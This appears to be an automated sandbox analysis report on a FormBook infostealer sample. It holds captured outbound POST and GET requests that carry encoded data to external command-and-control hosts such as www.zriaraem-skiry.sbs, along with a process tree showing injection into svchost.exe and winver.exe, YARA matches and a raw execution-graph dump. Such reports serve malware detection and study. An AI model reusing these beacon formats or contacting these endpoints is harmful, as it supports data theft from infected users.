                                                                    Timestamp: Jan 11, 2025 08:18:37.633712053 CET | Bytes transferred: 309 | Direction: IN | Data: HTTP/1.1 403 Forbidden
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:18:33 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID: 31 | Source IP: 192.168.2.7 | Source Port: 50004 | Destination IP: 147.255.21.187 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:39.584207058 CET | Bytes transferred: 1762 | Direction: OUT | Data: POST /u9hy/ HTTP/1.1
                                                                    Host: www.50food.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.50food.com
                                                                    Referer: http://www.50food.com/u9hy/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 62 6f 34 4c 72 4a 51 70 35 57 6a 52 41 6d 43 50 63 58 2b 38 4a 72 75 4a 45 59 31 47 74 45 5a 56 78 70 79 30 63 67 59 57 35 54 36 54 56 33 49 63 55 61 38 59 47 4a 57 32 35 34 57 7a 63 73 44 6f 4c 45 42 72 38 7a 79 57 67 68 2b 48 51 34 2b 68 70 62 49 65 4d 62 5a 6e 4f 68 72 75 73 41 56 6f 48 79 67 76 75 4e 63 61 6f 62 31 6c 4b 36 6b 79 57 54 6a 6a 75 6d 2f 56 79 62 62 76 4a 48 42 69 77 43 67 4d 64 56 76 6d 48 4a 41 51 53 31 50 57 55 43 33 35 69 59 4f 5a 2b 49 33 66 55 6d 4a 2f 33 62 65 71 44 39 72 75 38 70 43 63 59 2b 4c 44 75 64 71 6c 73 45 49 72 52 38 2b 64 56 57 33 74 73 70 65 70 51 59 64 7a 4e 67 4e 49 74 54 74 48 4d 61 34 6e 67 47 61 5a 46 43 35 66 6f 35 6f 74 4b 77 32 6a 71 45 64 63 58 4e 51 34 6b 5a 53 4e 73 65 58 48 6b 68 30 64 6b 59 4a 4a 4c 6e 39 58 4f 52 6b 57 73 51 66 48 39 38 49 58 54 6c 35 6c 57 46 66 47 30 50 63 36 67 5a 37 76 52 6f 35 36 44 38 67 55 58 54 62 57 67 33 53 43 2f 33 69 68 39 50 47 74 4f 74 34 63 45 36 77 79 34 41 66 38 4e 63 5a 2b 4c 49 6a 6b 79 46 4d 56 [TRUNCATED]
                                                                    Data Ascii: QbUPL= [TRUNCATED]
                                                                    Timestamp: Jan 11, 2025 08:18:40.173273087 CET | Bytes transferred: 309 | Direction: IN | Data: HTTP/1.1 403 Forbidden
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:18:35 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID: 32 | Source IP: 192.168.2.7 | Source Port: 50005 | Destination IP: 147.255.21.187 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:42.128494978 CET | Bytes transferred: 478 | Direction: OUT | Data: GET /u9hy/?QbUPL=WqQro+xdjTeJIlGzWne5GtaANfF9lgg49rKxVxpmjgGfbhgcY6AAEIO8u8GwbvTJPVNB3UOdkxCDRvWF6atxJpdnDAzWn2dcKGou59R0p8ISVdotXCTwv0fS6r3BHVImiCcwST7dAbkv&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.50food.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Timestamp: Jan 11, 2025 08:18:42.698919058 CET | Bytes transferred: 141 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:18:38 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 0
                                                                    Connection: close


                                                                    Session ID: 33 | Source IP: 192.168.2.7 | Source Port: 50006 | Destination IP: 104.21.42.77 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:47.764175892 CET | Bytes transferred: 753 | Direction: OUT | Data: POST /f8c6/ HTTP/1.1
                                                                    Host: www.zriaraem-skiry.sbs
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.zriaraem-skiry.sbs
                                                                    Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 6e 62 6a 52 64 34 6a 44 44 6f 47 6e 53 68 41 4b 37 5a 4c 36 56 38 62 38 34 30 75 6c 79 36 67 57 52 57 6f 64 79 65 71 54 4c 43 6a 31 44 74 63 7a 70 75 45 51 68 37 72 46 6e 62 7a 54 45 4c 65 4c 66 74 50 37 54 67 41 48 56 47 2b 64 67 55 71 39 4c 42 6d 6d 34 68 44 75 34 76 30 6a 67 72 6a 5a 52 4e 2f 2f 46 46 47 48 55 74 35 46 33 38 6f 44 38 77 35 52 62 48 79 4b 55 7a 45 59 46 6c 39 6f 45 2f 49 2b 72 44 34 70 32 54 4e 6d 5a 74 6f 5a 6a 32 31 53 55 54 45 61 59 78 48 62 73 59 77 50 39 56 76 45 51 68 34 66 73 79 31 56 79 2b 6d 4c 6c 2f 67 48 4a 69 54 6e 71 77 52 57 6b 70 51 68 33 67 41 70 66 6f 45 2f 4a 7a 4e 39 5a 47 63 34 4f 77 3d 3d
                                                                    Data Ascii: QbUPL=nbjRd4jDDoGnShAK7ZL6V8b840uly6gWRWodyeqTLCj1DtczpuEQh7rFnbzTELeLftP7TgAHVG+dgUq9LBmm4hDu4v0jgrjZRN//FFGHUt5F38oD8w5RbHyKUzEYFl9oE/I+rD4p2TNmZtoZj21SUTEaYxHbsYwP9VvEQh4fsy1Vy+mLl/gHJiTnqwRWkpQh3gApfoE/JzN9ZGc4Ow==


                                                                    Session ID: 34 | Source IP: 192.168.2.7 | Source Port: 50007 | Destination IP: 104.21.42.77 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:50.329575062 CET | Bytes transferred: 773 | Direction: OUT | Data: POST /f8c6/ HTTP/1.1
                                                                    Host: www.zriaraem-skiry.sbs
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.zriaraem-skiry.sbs
                                                                    Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 6e 62 6a 52 64 34 6a 44 44 6f 47 6e 54 42 77 4b 35 35 33 36 63 38 62 37 33 55 75 6c 6b 4b 68 64 52 58 55 64 79 62 4b 44 4c 51 58 31 47 34 67 7a 6d 50 45 51 78 72 72 46 6f 4c 7a 53 4b 72 65 4d 66 74 53 4d 54 6c 41 48 56 48 61 64 67 51 36 39 4c 51 6e 55 37 52 44 73 33 50 30 68 2f 37 6a 5a 52 4e 2f 2f 46 46 43 74 55 74 68 46 33 4d 34 44 7a 78 35 53 52 6e 79 4a 64 54 45 59 55 31 39 6b 45 2f 4a 64 72 42 4d 54 32 58 39 6d 5a 76 67 5a 6a 69 70 64 50 6a 45 6d 57 52 47 69 39 59 35 33 37 31 37 47 53 77 49 6c 71 41 4a 4f 36 6f 6e 70 2f 64 73 72 58 7a 72 63 75 79 31 67 7a 50 4e 55 31 68 45 78 53 4b 77 65 57 45 6f 58 55 55 39 38 59 45 57 33 6a 32 4a 55 51 49 52 41 51 53 35 33 34 49 72 4f 41 71 73 3d
                                                                    Data Ascii: QbUPL=nbjRd4jDDoGnTBwK5536c8b73UulkKhdRXUdybKDLQX1G4gzmPEQxrrFoLzSKreMftSMTlAHVHadgQ69LQnU7RDs3P0h/7jZRN//FFCtUthF3M4Dzx5SRnyJdTEYU19kE/JdrBMT2X9mZvgZjipdPjEmWRGi9Y53717GSwIlqAJO6onp/dsrXzrcuy1gzPNU1hExSKweWEoXUU98YEW3j2JUQIRAQS534IrOAqs=


                                                                    Session ID: 35 | Source IP: 192.168.2.7 | Source Port: 50008 | Destination IP: 104.21.42.77 | Destination Port: 80
                                                                    Timestamp: Jan 11, 2025 08:18:54.397610903 CET | Bytes transferred: 1786 | Direction: OUT | Data: POST /f8c6/ HTTP/1.1
                                                                    Host: www.zriaraem-skiry.sbs
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.zriaraem-skiry.sbs
                                                                    Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 6e 62 6a 52 64 34 6a 44 44 6f 47 6e 54 42 77 4b 35 35 33 36 63 38 62 37 33 55 75 6c 6b 4b 68 64 52 58 55 64 79 62 4b 44 4c 51 50 31 61 65 30 7a 6e 73 73 51 79 72 72 46 75 37 7a 58 4b 72 66 4a 66 74 4b 49 54 6c 45 58 56 46 53 64 6d 43 79 39 66 79 50 55 73 42 44 73 31 50 30 73 67 72 69 54 52 4a 6a 42 46 46 53 74 55 74 68 46 33 50 51 44 33 67 35 53 65 48 79 4b 55 7a 45 63 46 6c 39 49 45 38 34 6d 72 42 59 44 32 6b 31 6d 5a 50 77 5a 68 58 31 64 44 6a 45 67 56 52 47 54 39 59 6c 6f 37 31 6d 35 53 77 4e 43 71 41 78 4f 35 2f 4b 77 67 35 67 74 42 42 44 33 77 42 52 54 34 70 55 69 7a 58 46 48 4e 4e 55 61 62 56 30 42 4e 48 6c 42 54 6b 66 73 2b 55 42 64 5a 59 64 54 58 48 59 56 67 34 44 4d 52 65 51 4a 4a 31 6a 74 67 62 4e 30 78 73 53 2b 35 7a 44 79 6f 7a 7a 46 49 65 6e 72 62 48 45 2f 66 77 6a 39 71 6f 4b 76 34 43 44 4c 68 48 69 4f 30 42 48 76 74 51 58 75 77 6d 75 39 61 6d 68 6b 53 58 63 50 4e 47 72 67 4c 65 49 2b 4a 6b 30 63 49 77 38 43 48 49 57 4d 74 49 42 4f 44 61 50 37 46 76 6a 76 43 51 42 64 [TRUNCATED]
                                                                    Data Ascii: QbUPL= [TRUNCATED]



                                                                    Target ID:0
                                                                    Start time:02:15:45
                                                                    Start date:11/01/2025
                                                                    Path:C:\Users\user\Desktop\z6tNjJC614.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\z6tNjJC614.exe"
                                                                    Imagebase:0x510000
                                                                    File size:1'225'216 bytes
                                                                    MD5 hash:043A47D412717C236558774C700BB159
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:02:15:49
                                                                    Start date:11/01/2025
                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\z6tNjJC614.exe"
                                                                    Imagebase:0x170000
                                                                    File size:46'504 bytes
                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1635438569.0000000003810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1635938025.0000000006800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1635105463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:04:04:43
                                                                    Start date:11/01/2025
                                                                    Path:C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe"
                                                                    Imagebase:0x170000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3136712972.00000000086F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3128378843.00000000051C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:12
                                                                    Start time:04:04:47
                                                                    Start date:11/01/2025
                                                                    Path:C:\Windows\SysWOW64\winver.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\winver.exe"
                                                                    Imagebase:0xd20000
                                                                    File size:57'344 bytes
                                                                    MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3127767556.0000000004150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3127852915.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3124391485.0000000000490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:14
                                                                    Start time:04:05:15
                                                                    Start date:11/01/2025
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff722870000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true


                                                                      Execution Graph

                                                                      Execution Coverage:3.8%
                                                                      Dynamic/Decrypted Code Coverage:1.3%
                                                                      Signature Coverage:9%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:58
                                                                      [Execution graph: the interactive node/edge listing does not survive extraction and is omitted here. The API calls named on its nodes are: CreateFileW, ReadFile, VirtualAlloc, VirtualFree, CloseHandle, GetPEB; Shell_NotifyIconW, SetTimer, KillTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, DefWindowProcW, MoveWindow, SetFocus, LoadStringW, DestroyIcon, DestroyWindow, DeleteObject; PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, LockWindowUpdate; timeGetTime, QueryPerformanceCounter, QueryPerformanceFrequency, Sleep; WaitForSingleObject, GetExitCodeProcess; GetFileAttributesW, FindFirstFileW, FindClose, FreeLibrary, CharUpperBuffW, VariantClear; CRT and heap internals RtlAllocateHeap, RtlFreeHeap, GetLastError, EncodePointer, DecodePointer, RaiseException, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetModuleHandleExW, GetProcAddress, ExitProcess.]
EnterCriticalSection 101588->101589 101590 536c21 101588->101590 101592 5353f0 101589->101592 101590->101589 101591 536c29 101590->101591 101593 539c0b __lock 58 API calls 101591->101593 101594 53533a 101592->101594 101593->101592 101595 535349 101594->101595 101596 53535d 101594->101596 101656 538b28 58 API calls __getptd_noexit 101595->101656 101598 535359 101596->101598 101613 534a3d 101596->101613 101612 535415 LeaveCriticalSection LeaveCriticalSection __wfsopen 101598->101612 101600 53534e 101657 538db6 9 API calls __mbschr_l 101600->101657 101606 535377 101630 540a02 101606->101630 101608 53537d 101608->101598 101609 532d55 _free 58 API calls 101608->101609 101609->101598 101610->101581 101611->101584 101612->101584 101614 534a50 101613->101614 101615 534a74 101613->101615 101614->101615 101616 5346e6 __fflush_nolock 58 API calls 101614->101616 101619 540b77 101615->101619 101617 534a6d 101616->101617 101658 53d886 101617->101658 101620 535371 101619->101620 101621 540b84 101619->101621 101623 5346e6 101620->101623 101621->101620 101622 532d55 _free 58 API calls 101621->101622 101622->101620 101624 5346f0 101623->101624 101625 534705 101623->101625 101800 538b28 58 API calls __getptd_noexit 101624->101800 101625->101606 101627 5346f5 101801 538db6 9 API calls __mbschr_l 101627->101801 101629 534700 101629->101606 101631 540a0e __alloc_osfhnd 101630->101631 101632 540a32 101631->101632 101633 540a1b 101631->101633 101635 540abd 101632->101635 101638 540a42 101632->101638 101817 538af4 58 API calls __getptd_noexit 101633->101817 101822 538af4 58 API calls __getptd_noexit 101635->101822 101637 540a20 101818 538b28 58 API calls __getptd_noexit 101637->101818 101639 540a60 101638->101639 101640 540a6a 101638->101640 101819 538af4 58 API calls __getptd_noexit 101639->101819 101644 53d206 ___lock_fhandle 59 API calls 101640->101644 101641 540a65 101823 538b28 58 API calls __getptd_noexit 101641->101823 101647 540a70 101644->101647 101645 540a27 __alloc_osfhnd 
101645->101608 101649 540a83 101647->101649 101650 540a8e 101647->101650 101648 540ac9 101824 538db6 9 API calls __mbschr_l 101648->101824 101802 540add 101649->101802 101820 538b28 58 API calls __getptd_noexit 101650->101820 101654 540a89 101821 540ab5 LeaveCriticalSection __unlock_fhandle 101654->101821 101656->101600 101657->101598 101659 53d892 __alloc_osfhnd 101658->101659 101660 53d8b6 101659->101660 101661 53d89f 101659->101661 101663 53d955 101660->101663 101666 53d8ca 101660->101666 101759 538af4 58 API calls __getptd_noexit 101661->101759 101765 538af4 58 API calls __getptd_noexit 101663->101765 101665 53d8a4 101760 538b28 58 API calls __getptd_noexit 101665->101760 101669 53d8f2 101666->101669 101670 53d8e8 101666->101670 101667 53d8ed 101766 538b28 58 API calls __getptd_noexit 101667->101766 101686 53d206 101669->101686 101761 538af4 58 API calls __getptd_noexit 101670->101761 101674 53d8f8 101676 53d90b 101674->101676 101677 53d91e 101674->101677 101675 53d961 101767 538db6 9 API calls __mbschr_l 101675->101767 101695 53d975 101676->101695 101762 538b28 58 API calls __getptd_noexit 101677->101762 101681 53d8ab __alloc_osfhnd 101681->101615 101682 53d917 101764 53d94d LeaveCriticalSection __unlock_fhandle 101682->101764 101683 53d923 101763 538af4 58 API calls __getptd_noexit 101683->101763 101687 53d212 __alloc_osfhnd 101686->101687 101688 53d261 EnterCriticalSection 101687->101688 101689 539c0b __lock 58 API calls 101687->101689 101690 53d287 __alloc_osfhnd 101688->101690 101691 53d237 101689->101691 101690->101674 101694 53d24f 101691->101694 101768 539e2b InitializeCriticalSectionAndSpinCount 101691->101768 101769 53d28b LeaveCriticalSection _doexit 101694->101769 101696 53d982 __write_nolock 101695->101696 101697 53d9c1 101696->101697 101698 53d9e0 101696->101698 101729 53d9b6 101696->101729 101779 538af4 58 API calls __getptd_noexit 101697->101779 101701 53da38 101698->101701 101702 53da1c 101698->101702 101707 53da51 101701->101707 101785 5418c1 
60 API calls 3 library calls 101701->101785 101782 538af4 58 API calls __getptd_noexit 101702->101782 101703 53e1d6 101703->101682 101704 53d9c6 101780 538b28 58 API calls __getptd_noexit 101704->101780 101770 545c6b 101707->101770 101708 53da21 101783 538b28 58 API calls __getptd_noexit 101708->101783 101709 53d9cd 101781 538db6 9 API calls __mbschr_l 101709->101781 101714 53da5f 101716 53ddb8 101714->101716 101786 5399ac 58 API calls 2 library calls 101714->101786 101715 53da28 101784 538db6 9 API calls __mbschr_l 101715->101784 101717 53ddd6 101716->101717 101718 53e14b WriteFile 101716->101718 101721 53defa 101717->101721 101727 53ddec 101717->101727 101722 53ddab GetLastError 101718->101722 101731 53dd78 101718->101731 101733 53dfef 101721->101733 101735 53df05 101721->101735 101722->101731 101723 53da8b GetConsoleMode 101723->101716 101725 53daca 101723->101725 101724 53e184 101724->101729 101791 538b28 58 API calls __getptd_noexit 101724->101791 101725->101716 101726 53dada GetConsoleCP 101725->101726 101726->101724 101745 53db09 101726->101745 101727->101724 101728 53de5b WriteFile 101727->101728 101728->101722 101734 53de98 101728->101734 101793 53c5f6 101729->101793 101731->101724 101731->101729 101732 53ded8 101731->101732 101737 53dee3 101732->101737 101738 53e17b 101732->101738 101733->101724 101739 53e064 WideCharToMultiByte 101733->101739 101734->101727 101754 53debc 101734->101754 101735->101724 101740 53df6a WriteFile 101735->101740 101736 53e1b2 101792 538af4 58 API calls __getptd_noexit 101736->101792 101788 538b28 58 API calls __getptd_noexit 101737->101788 101790 538b07 58 API calls 3 library calls 101738->101790 101739->101722 101752 53e0ab 101739->101752 101740->101722 101744 53dfb9 101740->101744 101744->101731 101744->101735 101744->101754 101745->101731 101751 5462ba 60 API calls __write_nolock 101745->101751 101755 53dbf2 WideCharToMultiByte 101745->101755 101758 53dc5f 101745->101758 101787 5335f5 58 API calls __isleadbyte_l 
101745->101787 101746 53dee8 101789 538af4 58 API calls __getptd_noexit 101746->101789 101747 53e0b3 WriteFile 101750 53e106 GetLastError 101747->101750 101747->101752 101750->101752 101751->101745 101752->101731 101752->101733 101752->101747 101752->101754 101753 547a5e WriteConsoleW CreateFileW __putwch_nolock 101753->101758 101754->101731 101755->101731 101756 53dc2d WriteFile 101755->101756 101756->101722 101756->101758 101757 53dc87 WriteFile 101757->101722 101757->101758 101758->101722 101758->101731 101758->101745 101758->101753 101758->101757 101759->101665 101760->101681 101761->101667 101762->101683 101763->101682 101764->101681 101765->101667 101766->101675 101767->101681 101768->101694 101769->101688 101771 545c76 101770->101771 101772 545c83 101770->101772 101773 538b28 __mbschr_l 58 API calls 101771->101773 101775 545c8f 101772->101775 101776 538b28 __mbschr_l 58 API calls 101772->101776 101774 545c7b 101773->101774 101774->101714 101775->101714 101777 545cb0 101776->101777 101778 538db6 __mbschr_l 9 API calls 101777->101778 101778->101774 101779->101704 101780->101709 101781->101729 101782->101708 101783->101715 101784->101729 101785->101707 101786->101723 101787->101745 101788->101746 101789->101729 101790->101729 101791->101736 101792->101729 101794 53c600 IsProcessorFeaturePresent 101793->101794 101795 53c5fe 101793->101795 101797 54590a 101794->101797 101795->101703 101798 5458b9 ___raise_securityfailure 5 API calls 101797->101798 101799 5459ed 101798->101799 101799->101703 101800->101627 101801->101629 101825 53d4c3 101802->101825 101804 540b41 101838 53d43d 59 API calls 2 library calls 101804->101838 101806 540aeb 101806->101804 101808 53d4c3 __close_nolock 58 API calls 101806->101808 101816 540b1f 101806->101816 101807 540b49 101810 540b6b 101807->101810 101839 538b07 58 API calls 3 library calls 101807->101839 101811 540b16 101808->101811 101809 53d4c3 __close_nolock 58 API calls 101812 540b2b CloseHandle 101809->101812 101810->101654 101814 
53d4c3 __close_nolock 58 API calls 101811->101814 101812->101804 101815 540b37 GetLastError 101812->101815 101814->101816 101815->101804 101816->101804 101816->101809 101817->101637 101818->101645 101819->101641 101820->101654 101821->101645 101822->101641 101823->101648 101824->101645 101826 53d4ce 101825->101826 101827 53d4e3 101825->101827 101840 538af4 58 API calls __getptd_noexit 101826->101840 101831 53d508 101827->101831 101842 538af4 58 API calls __getptd_noexit 101827->101842 101830 53d4d3 101841 538b28 58 API calls __getptd_noexit 101830->101841 101831->101806 101832 53d512 101843 538b28 58 API calls __getptd_noexit 101832->101843 101835 53d4db 101835->101806 101836 53d51a 101844 538db6 9 API calls __mbschr_l 101836->101844 101838->101807 101839->101810 101840->101830 101841->101835 101842->101832 101843->101836 101844->101835 101846 517a16 59 API calls 101845->101846 101864 516265 101846->101864 101847 51646a 101873 51750f 101847->101873 101849 516484 Mailbox 101849->101444 101852 51750f 59 API calls 101852->101864 101853 54dff6 101883 56f8aa 91 API calls 4 library calls 101853->101883 101854 517d8c 59 API calls 101854->101864 101858 54e004 101859 51750f 59 API calls 101858->101859 101860 54e01a 101859->101860 101860->101849 101861 516799 _memmove 101884 56f8aa 91 API calls 4 library calls 101861->101884 101862 54df92 101863 518029 59 API calls 101862->101863 101865 54df9d 101863->101865 101864->101847 101864->101852 101864->101853 101864->101854 101864->101861 101864->101862 101867 517e4f 59 API calls 101864->101867 101871 515f6c 60 API calls 101864->101871 101872 515d41 59 API calls Mailbox 101864->101872 101881 515e72 60 API calls 101864->101881 101882 517924 59 API calls 2 library calls 101864->101882 101869 530db6 Mailbox 59 API calls 101865->101869 101868 51643b CharUpperBuffW 101867->101868 101868->101864 101869->101861 101870->101448 101871->101864 101872->101864 101874 5175af 101873->101874 101879 517522 _memmove 101873->101879 101876 530db6 
